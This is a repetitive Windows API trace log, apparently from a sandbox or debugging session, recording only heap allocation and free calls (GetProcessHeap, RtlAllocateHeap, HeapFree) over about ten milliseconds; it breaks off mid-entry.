[0058.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.004] GetProcessHeap () returned 0x280000 [0058.004] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.004] GetProcessHeap () returned 0x280000 [0058.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.004] GetProcessHeap () returned 0x280000 [0058.004] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.004] GetProcessHeap () returned 0x280000 [0058.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.004] GetProcessHeap () returned 0x280000 [0058.004] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.004] GetProcessHeap () returned 0x280000 [0058.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.004] GetProcessHeap () returned 0x280000 [0058.004] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.004] GetProcessHeap () returned 0x280000 [0058.005] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.005] GetProcessHeap () returned 0x280000 [0058.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.005] GetProcessHeap () returned 0x280000 [0058.005] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.005] GetProcessHeap () returned 0x280000 [0058.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.005] GetProcessHeap () returned 0x280000 [0058.005] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.005] GetProcessHeap () returned 0x280000 [0058.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.005] GetProcessHeap () returned 0x280000 [0058.005] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.005] GetProcessHeap () returned 0x280000 [0058.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.005] GetProcessHeap () returned 0x280000 [0058.005] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.005] GetProcessHeap () returned 0x280000 [0058.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.005] GetProcessHeap () returned 0x280000 [0058.005] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.005] GetProcessHeap () returned 0x280000 [0058.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.005] GetProcessHeap () returned 0x280000 [0058.005] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.005] GetProcessHeap () returned 0x280000 [0058.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.005] GetProcessHeap () returned 0x280000 [0058.005] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.005] GetProcessHeap () returned 0x280000 [0058.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.005] GetProcessHeap () returned 0x280000 [0058.005] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.005] GetProcessHeap () returned 0x280000 [0058.005] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.005] GetProcessHeap () returned 0x280000 [0058.005] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.005] GetProcessHeap () returned 0x280000 [0058.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.006] GetProcessHeap () returned 0x280000 [0058.006] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.006] GetProcessHeap () returned 0x280000 [0058.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.006] GetProcessHeap () returned 0x280000 [0058.006] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.006] GetProcessHeap () returned 0x280000 [0058.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.006] GetProcessHeap () returned 0x280000 [0058.006] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.006] GetProcessHeap () returned 0x280000 [0058.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.006] GetProcessHeap () returned 0x280000 [0058.006] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.006] GetProcessHeap () returned 0x280000 [0058.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.006] GetProcessHeap () returned 0x280000 [0058.006] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.006] GetProcessHeap () returned 0x280000 [0058.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.006] GetProcessHeap () returned 0x280000 [0058.006] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.006] GetProcessHeap () returned 0x280000 [0058.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.006] GetProcessHeap () returned 0x280000 [0058.006] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.006] GetProcessHeap () returned 0x280000 [0058.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.006] GetProcessHeap () returned 0x280000 [0058.006] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.006] GetProcessHeap () returned 0x280000 [0058.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.006] GetProcessHeap () returned 0x280000 [0058.006] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.006] GetProcessHeap () returned 0x280000 [0058.006] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.007] GetProcessHeap () returned 0x280000 [0058.007] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.007] GetProcessHeap () returned 0x280000 [0058.007] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.007] GetProcessHeap () returned 0x280000 [0058.007] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.007] GetProcessHeap () returned 0x280000 [0058.007] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.007] GetProcessHeap () returned 0x280000 [0058.007] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.007] GetProcessHeap () returned 0x280000 [0058.007] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.007] GetProcessHeap () returned 0x280000 [0058.007] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.007] GetProcessHeap () returned 0x280000 [0058.007] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.007] GetProcessHeap () returned 0x280000 [0058.007] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.007] GetProcessHeap () returned 0x280000 [0058.007] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.007] GetProcessHeap () returned 0x280000 [0058.007] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.007] GetProcessHeap () returned 0x280000 [0058.007] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.007] GetProcessHeap () returned 0x280000 [0058.007] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.007] GetProcessHeap () returned 0x280000 [0058.007] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.007] GetProcessHeap () returned 0x280000 [0058.007] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.007] GetProcessHeap () returned 0x280000 [0058.007] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.007] GetProcessHeap () returned 0x280000 [0058.007] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.007] GetProcessHeap () returned 0x280000 [0058.007] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.007] GetProcessHeap () returned 0x280000 [0058.007] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.008] GetProcessHeap () returned 0x280000 [0058.008] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.008] GetProcessHeap () returned 0x280000 [0058.008] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.008] GetProcessHeap () returned 0x280000 [0058.008] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.008] GetProcessHeap () returned 0x280000 [0058.008] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.008] GetProcessHeap () returned 0x280000 [0058.008] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.008] GetProcessHeap () returned 0x280000 [0058.008] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.008] GetProcessHeap () returned 0x280000 [0058.008] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.008] GetProcessHeap () returned 0x280000 [0058.008] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.008] GetProcessHeap () returned 0x280000 [0058.008] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.008] GetProcessHeap () returned 0x280000 [0058.008] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.008] GetProcessHeap () returned 0x280000 [0058.008] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.008] GetProcessHeap () returned 0x280000 [0058.008] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.008] GetProcessHeap () returned 0x280000 [0058.008] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.008] GetProcessHeap () returned 0x280000 [0058.008] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.008] GetProcessHeap () returned 0x280000 [0058.008] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.008] GetProcessHeap () returned 0x280000 [0058.008] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.008] GetProcessHeap () returned 0x280000 [0058.008] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.008] GetProcessHeap () returned 0x280000 [0058.008] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.008] GetProcessHeap () returned 0x280000 [0058.008] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.009] GetProcessHeap () returned 0x280000 [0058.009] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.009] GetProcessHeap () returned 0x280000 [0058.009] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.009] GetProcessHeap () returned 0x280000 [0058.009] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.009] GetProcessHeap () returned 0x280000 [0058.009] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.009] GetProcessHeap () returned 0x280000 [0058.009] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.009] GetProcessHeap () returned 0x280000 [0058.009] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.009] GetProcessHeap () returned 0x280000 [0058.009] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.009] GetProcessHeap () returned 0x280000 [0058.009] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.009] GetProcessHeap () returned 0x280000 [0058.009] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.009] GetProcessHeap () returned 0x280000 [0058.009] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.009] GetProcessHeap () returned 0x280000 [0058.009] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.009] GetProcessHeap () returned 0x280000 [0058.009] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.009] GetProcessHeap () returned 0x280000 [0058.009] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.009] GetProcessHeap () returned 0x280000 [0058.009] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.009] GetProcessHeap () returned 0x280000 [0058.009] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.009] GetProcessHeap () returned 0x280000 [0058.009] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.009] GetProcessHeap () returned 0x280000 [0058.009] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.009] GetProcessHeap () returned 0x280000 [0058.009] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.009] GetProcessHeap () returned 0x280000 [0058.010] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.010] GetProcessHeap () returned 0x280000 [0058.010] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.010] GetProcessHeap () returned 0x280000 [0058.010] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.010] GetProcessHeap () returned 0x280000 [0058.010] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.010] GetProcessHeap () returned 0x280000 [0058.010] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.010] GetProcessHeap () returned 0x280000 [0058.010] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.010] GetProcessHeap () returned 0x280000 [0058.010] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.010] GetProcessHeap () returned 0x280000 [0058.010] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.010] GetProcessHeap () returned 0x280000 [0058.010] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.010] GetProcessHeap () returned 0x280000 [0058.010] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.010] GetProcessHeap () returned 0x280000 [0058.010] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.010] GetProcessHeap () returned 0x280000 [0058.010] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.010] GetProcessHeap () returned 0x280000 [0058.010] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.010] GetProcessHeap () returned 0x280000 [0058.010] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.010] GetProcessHeap () returned 0x280000 [0058.010] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.010] GetProcessHeap () returned 0x280000 [0058.010] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.010] GetProcessHeap () returned 0x280000 [0058.010] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.010] GetProcessHeap () returned 0x280000 [0058.010] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.010] GetProcessHeap () returned 0x280000 [0058.010] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.010] GetProcessHeap () returned 0x280000 [0058.011] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.011] GetProcessHeap () returned 0x280000 [0058.011] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.011] GetProcessHeap () returned 0x280000 [0058.011] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.011] GetProcessHeap () returned 0x280000 [0058.011] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.011] GetProcessHeap () returned 0x280000 [0058.011] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.011] GetProcessHeap () returned 0x280000 [0058.011] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.011] GetProcessHeap () returned 0x280000 [0058.011] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.011] GetProcessHeap () returned 0x280000 [0058.011] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.011] GetProcessHeap () returned 0x280000 [0058.011] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.011] GetProcessHeap () returned 0x280000 [0058.011] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.011] GetProcessHeap () returned 0x280000 [0058.011] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.011] GetProcessHeap () returned 0x280000 [0058.011] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.011] GetProcessHeap () returned 0x280000 [0058.011] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.011] GetProcessHeap () returned 0x280000 [0058.011] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.011] GetProcessHeap () returned 0x280000 [0058.011] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.011] GetProcessHeap () returned 0x280000 [0058.011] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.011] GetProcessHeap () returned 0x280000 [0058.011] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.011] GetProcessHeap () returned 0x280000 [0058.011] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.011] GetProcessHeap () returned 0x280000 [0058.011] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.012] GetProcessHeap () returned 0x280000 [0058.012] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.012] GetProcessHeap () returned 0x280000 [0058.012] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.012] GetProcessHeap () returned 0x280000 [0058.012] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.012] GetProcessHeap () returned 0x280000 [0058.012] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.012] GetProcessHeap () returned 0x280000 [0058.012] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.012] GetProcessHeap () returned 0x280000 [0058.012] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.012] GetProcessHeap () returned 0x280000 [0058.012] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.012] GetProcessHeap () returned 0x280000 [0058.012] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.012] GetProcessHeap () returned 0x280000 [0058.012] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.012] GetProcessHeap () returned 0x280000 [0058.012] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.012] GetProcessHeap () returned 0x280000 [0058.012] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.012] GetProcessHeap () returned 0x280000 [0058.012] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.012] GetProcessHeap () returned 0x280000 [0058.012] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.012] GetProcessHeap () returned 0x280000 [0058.012] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.012] GetProcessHeap () returned 0x280000 [0058.012] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.012] GetProcessHeap () returned 0x280000 [0058.012] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.012] GetProcessHeap () returned 0x280000 [0058.012] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.012] GetProcessHeap () returned 0x280000 [0058.012] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.013] GetProcessHeap () returned 0x280000 [0058.013] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.013] GetProcessHeap () returned 0x280000 [0058.013] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.013] GetProcessHeap () returned 0x280000 [0058.013] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.013] GetProcessHeap () returned 0x280000 [0058.013] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.013] GetProcessHeap () returned 0x280000 [0058.013] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.013] GetProcessHeap () returned 0x280000 [0058.013] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.013] GetProcessHeap () returned 0x280000 [0058.013] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.013] GetProcessHeap () returned 0x280000 [0058.013] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.013] GetProcessHeap () returned 0x280000 [0058.013] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.013] GetProcessHeap () returned 0x280000 [0058.013] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x34f0b8 [0058.013] GetProcessHeap () returned 0x280000 [0058.013] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.013] GetProcessHeap () returned 0x280000 [0058.013] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.013] GetProcessHeap () returned 0x280000 [0058.013] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x34f0b8 | out: hHeap=0x280000) returned 1 [0058.013] GetProcessHeap () returned 0x280000 [0058.013] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.013] GetProcessHeap () returned 0x280000 [0058.013] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.013] GetProcessHeap () returned 0x280000 [0058.013] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.013] GetProcessHeap () returned 0x280000 [0058.013] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.013] GetProcessHeap () returned 0x280000 [0058.013] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.013] GetProcessHeap () returned 0x280000 [0058.013] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.014] GetProcessHeap () returned 0x280000 [0058.014] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.014] GetProcessHeap () returned 0x280000 [0058.014] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2b0f30 | out: hHeap=0x280000) returned 1 [0058.014] GetProcessHeap () returned 0x280000 [0058.014] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x2b0f30 [0058.014] GetProcessHeap () returned 